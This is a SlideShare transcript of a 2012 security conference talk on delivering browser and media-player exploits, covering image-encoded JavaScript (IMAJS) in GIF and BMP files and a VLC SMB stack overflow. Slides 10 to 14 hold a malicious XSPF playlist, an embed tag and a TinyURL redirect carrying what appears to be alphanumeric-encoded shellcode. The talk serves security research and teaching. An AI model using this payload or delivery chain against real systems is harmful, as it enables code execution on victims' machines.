Saumil Shah, profile picture
Uploaded bySaumil Shah
2,364 views

Innovative Exploit Delivery

The document discusses innovative ways to deliver exploits, including encoding them in image file formats by using the image's alpha channel or pixel values to represent exploit code. Specific techniques demonstrated include encoding exploits in GIF and BMP images, using HTML5 canvas to decode and execute the encoded JavaScript, and shortening encoded exploit URLs with services like TinyURL. The presentation concludes by considering potential future avenues for this approach using emerging web technologies.

Embed presentation

INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAH net-square HITB2012KUL
# who am i Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University. • saumil@net-square.com • LinkedIn: saumilshah • Twitter: @therealsaumil net-square
My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open" net-square
When two forces combine... Web Binary Hacking Exploits net-square
SNEAKY LETHAL net-square
net-square
302 IMG JS HTML5 net-square
net-square
VLC smb overflow • smb://example.com@0.0.0.0/foo/#{AAAA AAAA....} • Classic Stack Overflow. net-square
VLC XSPF file <?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList> </playlist> net-square
Alpha Encoded Tiny ZOMFG Exploit URL net-square
100% Pure Alphanum! net-square
VLC smb overflow - HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square
301 Redirect from tinyurl HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/5.2.12 Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAX P0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNO QeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBAB XP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIP QdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJc EaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOs IPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA} Content-type: text/html Content-Length: 0 Connection: close Server: TinyURL/1.6 net-square
net-square
Exploits as Images - 1 • Grayscale encoding (0-255). • 1 pixel = 1 character. • Perfectly valid image. • Decode and Execute! net-square
net-square
I'm an evil Javascript I'm an innocent image net-square
<CANVAS> net-square
net-square c) no eval()
Same Same No Different! var a = eval(str); a = (new Function(str))(); net-square
d) IMAJS net-square
IMAJS Seeing is Believing net-square
Browser Support for IMAJS-GIF Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square
Browser Support for IMAJS-BMP Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square
e) The αq exploit net-square
Encode using Alpha channel net-square
Demo IMAJS αq FTW! net-square
f) ONE LAST DEMO!!! net-square
The FUTURE? HTML5 Video SVG WebGL Mobile Browsers net-square
KTHXBAI See you in 2013?? net-square saumil@net-square.com | @therealsaumil

More Related Content

PDF
Deadly pixels - NSC 2013
bySaumil Shah
 
PDF
Hacking with Pictures - Hack.LU 2014
bySaumil Shah
 
PDF
Keep Calm and Stegosploit - 44CON 2015
bySaumil Shah
 
PDF
Stegosploit - Hacking With Pictures HITB2015AMS
bySaumil Shah
 
PPTX
Exploit Delivery
bySaumil Shah
 
PPTX
2010 A Net Odyssey
bySaumil Shah
 
PPTX
2012: The End of the World?
bySaumil Shah
 
PDF
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
bySaumil Shah
 
Deadly pixels - NSC 2013
bySaumil Shah
 
Hacking with Pictures - Hack.LU 2014
bySaumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
bySaumil Shah
 
Stegosploit - Hacking With Pictures HITB2015AMS
bySaumil Shah
 
Exploit Delivery
bySaumil Shah
 
2010 A Net Odyssey
bySaumil Shah
 
2012: The End of the World?
bySaumil Shah
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
bySaumil Shah
 

Similar to Innovative Exploit Delivery

PDF
Web Security - Introduction
bySQALab
 
PDF
Exploiting Firefox Extensions
byRoberto Suggi Liverani
 
PDF
Html5 security
bytsinghua university
 
PPT
Dmk bo2 k7_web
byDan Kaminsky
 
PDF
Hacking With Pictures SyScan 2015
bySaumil Shah
 
PPTX
W.E.B. 2010 - Web, Exploits, Browsers
bySaumil Shah
 
PDF
Browser Horror Stories
byEC-Council
 
PDF
DNS May Be Hazardous to Your Health
byRobert Stucke
 
PPT
Design Reviewing The Web
byamiable_indian
 
PPT
Dmk Bo2 K7 Web
byroyans
 
PDF
Technology for Teachers
byedfactor
 
PDF
Web Security - Introduction v.1.3
byOles Seheda
 
KEY
Modern Web Technologies — Jerusalem Web Professionals, January 2011
byReuven Lerner
 
PDF
Mozcafe@bcrec1
byChandan Singh
 
PPS
Workshop on BackTrack live CD
byamiable_indian
 
PDF
Ht w23
bySelectedPresentations
 
PDF
Disclosing Vulnerabilities for Fun and Profit
byn|u - The Open Security Community
 
PPTX
Basic Internet_Baabtra.com template
byJijo Joseph
 
PPTX
Baabtra.com template_Basics about Internet_jijojoseph
byJijo Joseph
 
PDF
Layer 7: Securing Web 2.0 - What You Need to Know
byCA API Management
 
Web Security - Introduction
bySQALab
 
Exploiting Firefox Extensions
byRoberto Suggi Liverani
 
Html5 security
bytsinghua university
 
Dmk bo2 k7_web
byDan Kaminsky
 
Hacking With Pictures SyScan 2015
bySaumil Shah
 
W.E.B. 2010 - Web, Exploits, Browsers
bySaumil Shah
 
Browser Horror Stories
byEC-Council
 
DNS May Be Hazardous to Your Health
byRobert Stucke
 
Design Reviewing The Web
byamiable_indian
 
Dmk Bo2 K7 Web
byroyans
 
Technology for Teachers
byedfactor
 
Web Security - Introduction v.1.3
byOles Seheda
 
Modern Web Technologies — Jerusalem Web Professionals, January 2011
byReuven Lerner
 
Mozcafe@bcrec1
byChandan Singh
 
Workshop on BackTrack live CD
byamiable_indian
 
Ht w23
bySelectedPresentations
 
Disclosing Vulnerabilities for Fun and Profit
byn|u - The Open Security Community
 
Basic Internet_Baabtra.com template
byJijo Joseph
 
Baabtra.com template_Basics about Internet_jijojoseph
byJijo Joseph
 
Layer 7: Securing Web 2.0 - What You Need to Know
byCA API Management
 

More from Saumil Shah

PDF
INSIDE ARM-X Cansecwest 2020
bySaumil Shah
 
PDF
ARM Polyglot Shellcode - HITB2019AMS
bySaumil Shah
 
PDF
The Hand That Strikes, Also Blocks
bySaumil Shah
 
PDF
Make ARM Shellcode Great Again - HITB2018PEK
bySaumil Shah
 
PDF
Announcing ARMX Docker - DC11332
bySaumil Shah
 
PDF
The Road To Defendable Systems - Emirates NBD
bySaumil Shah
 
PDF
Precise Presentations
bySaumil Shah
 
PDF
Schrödinger's ARM Assembly
bySaumil Shah
 
PDF
Introducing ARM-X
bySaumil Shah
 
PDF
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
bySaumil Shah
 
PDF
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
bySaumil Shah
 
PDF
The CISO's Dilemma 44CON 2019
bySaumil Shah
 
PDF
Cybersecurity In India - The Decade Ahead
bySaumil Shah
 
PDF
Effective Webinars: Presentation Skills for a Virtual Audience
bySaumil Shah
 
PDF
NSConclave2020 The Decade Behind And The Decade Ahead
bySaumil Shah
 
PDF
INSIDE ARM-X - Countermeasure 2019
bySaumil Shah
 
PDF
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
bySaumil Shah
 
PDF
Cyberspace And Security - India's Decade Ahead
bySaumil Shah
 
PDF
The CISO's Dilemma HITBGSEC2019
bySaumil Shah
 
PDF
What Makes a Compelling Photograph
bySaumil Shah
 
INSIDE ARM-X Cansecwest 2020
bySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
bySaumil Shah
 
The Hand That Strikes, Also Blocks
bySaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
bySaumil Shah
 
Announcing ARMX Docker - DC11332
bySaumil Shah
 
The Road To Defendable Systems - Emirates NBD
bySaumil Shah
 
Precise Presentations
bySaumil Shah
 
Schrödinger's ARM Assembly
bySaumil Shah
 
Introducing ARM-X
bySaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
bySaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
bySaumil Shah
 
The CISO's Dilemma 44CON 2019
bySaumil Shah
 
Cybersecurity In India - The Decade Ahead
bySaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
bySaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
bySaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
bySaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
bySaumil Shah
 
Cyberspace And Security - India's Decade Ahead
bySaumil Shah
 
The CISO's Dilemma HITBGSEC2019
bySaumil Shah
 
What Makes a Compelling Photograph
bySaumil Shah
 

Recently uploaded

PDF
The State of the Gen AI economy - 2025 - The Meliora Company
byClive Dickens
 
PDF
100 Insights After the 200th Issue of NewMind AI Journal
byNewMind AI
 
PDF
Data Virtualization in Action: Scaling APIs and Apps with FME
bySafe Software
 
PPTX
Coded Agents – with UiPath SDK + LangGraph [Virtual Hands-on Workshop]
byUiPathCommunity
 
PDF
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
PDF
10 Things AI-First Apps Do Differently by iProgrammer Solutions
byiProgrammer Solutions Private Limited
 
PDF
Unlocking the Power of Salesforce Architecture: Frameworks for Effective Solu...
byvarsha30tiwari
 
PDF
Real-Time Data Insight Using Microsoft Forms for Business
byElevate
 
PPTX
How to make Ai agents using Google Gemini AI.pptx
bypkluffy111
 
PPTX
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
PDF
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
PDF
Security Forum Sessions from Houston 2025 Event
byMark Simos
 
PPTX
Top _HR Technology Trends _for 2026_.pptx
byAutomationEdge Technologies
 
PDF
Our Digital Tribe_ Cultivating Connection and Growth in Our Slack Community 🌿...
bysanjeetmishra30
 
PDF
CompTIA Cybersecurity Analyst (CySA+) CS0-003: Unit 5
byVICTOR MAESTRE RAMIREZ
 
PPTX
DYNAMICALLY.pptx good for the teachers or students to do seminars and for tea...
bympoorvika031
 
PPTX
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
PPTX
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
PPTX
Building Cyber Resilience for 2026: Best Practices for a Secure, AI-Driven Bu...
byYasir Naveed Riaz
 
DOCX
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
The State of the Gen AI economy - 2025 - The Meliora Company
byClive Dickens
 
100 Insights After the 200th Issue of NewMind AI Journal
byNewMind AI
 
Data Virtualization in Action: Scaling APIs and Apps with FME
bySafe Software
 
Coded Agents – with UiPath SDK + LangGraph [Virtual Hands-on Workshop]
byUiPathCommunity
 
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
10 Things AI-First Apps Do Differently by iProgrammer Solutions
byiProgrammer Solutions Private Limited
 
Unlocking the Power of Salesforce Architecture: Frameworks for Effective Solu...
byvarsha30tiwari
 
Real-Time Data Insight Using Microsoft Forms for Business
byElevate
 
How to make Ai agents using Google Gemini AI.pptx
bypkluffy111
 
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
Security Forum Sessions from Houston 2025 Event
byMark Simos
 
Top _HR Technology Trends _for 2026_.pptx
byAutomationEdge Technologies
 
Our Digital Tribe_ Cultivating Connection and Growth in Our Slack Community 🌿...
bysanjeetmishra30
 
CompTIA Cybersecurity Analyst (CySA+) CS0-003: Unit 5
byVICTOR MAESTRE RAMIREZ
 
DYNAMICALLY.pptx good for the teachers or students to do seminars and for tea...
bympoorvika031
 
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
From Backup to Resilience: How MSPs Are Preparing for 2026
byMSP360
 
Building Cyber Resilience for 2026: Best Practices for a Secure, AI-Driven Bu...
byYasir Naveed Riaz
 
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 

Innovative Exploit Delivery

  • 1.
    INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAH net-square HITB2012KUL
  • 2.
    # who ami Saumil Shah, CEO Net-Square. • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. • M.S. Computer Science Purdue University. • saumil@net-square.com • LinkedIn: saumilshah • Twitter: @therealsaumil net-square
  • 3.
    My area ofwork Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open" net-square
  • 4.
    When two forcescombine... Web Binary Hacking Exploits net-square
  • 5.
    SNEAKY LETHAL net-square
  • 6.
  • 7.
    302 IMG JS HTML5 net-square
  • 8.
  • 9.
    VLC smb overflow •smb://example.com@0.0.0.0/foo/#{AAAA AAAA....} • Classic Stack Overflow. net-square
  • 10.
    VLC XSPF file <?xmlversion="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList> </playlist> net-square
  • 11.
    Alpha Encoded Tiny ZOMFG Exploit URL net-square
  • 12.
    100% Pure Alphanum! net-square
  • 13.
    VLC smb overflow- HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square
  • 14.
    301 Redirect fromtinyurl HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/5.2.12 Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAX P0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNO QeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBAB XP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIP QdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJc EaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOs IPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA} Content-type: text/html Content-Length: 0 Connection: close Server: TinyURL/1.6 net-square
  • 15.
  • 16.
    Exploits as Images- 1 • Grayscale encoding (0-255). • 1 pixel = 1 character. • Perfectly valid image. • Decode and Execute! net-square
  • 17.
  • 18.
    I'm an evilJavascript I'm an innocent image net-square
  • 19.
  • 20.
    net-square c) no eval()
  • 21.
    Same Same NoDifferent! var a = eval(str); a = (new Function(str))(); net-square
  • 22.
  • 23.
    IMAJS Seeing is Believing net-square
  • 24.
    Browser Support forIMAJS-GIF Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square
  • 25.
    Browser Support forIMAJS-BMP Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square
  • 26.
    e) The αq exploit net-square
  • 27.
    Encode using Alphachannel net-square
  • 28.
    Demo IMAJS αq FTW! net-square
  • 29.
    f) ONE LASTDEMO!!! net-square
  • 30.
    The FUTURE? HTML5 Video SVG WebGL Mobile Browsers net-square
  • 31.
    KTHXBAI See you in 2013?? net-square saumil@net-square.com | @therealsaumil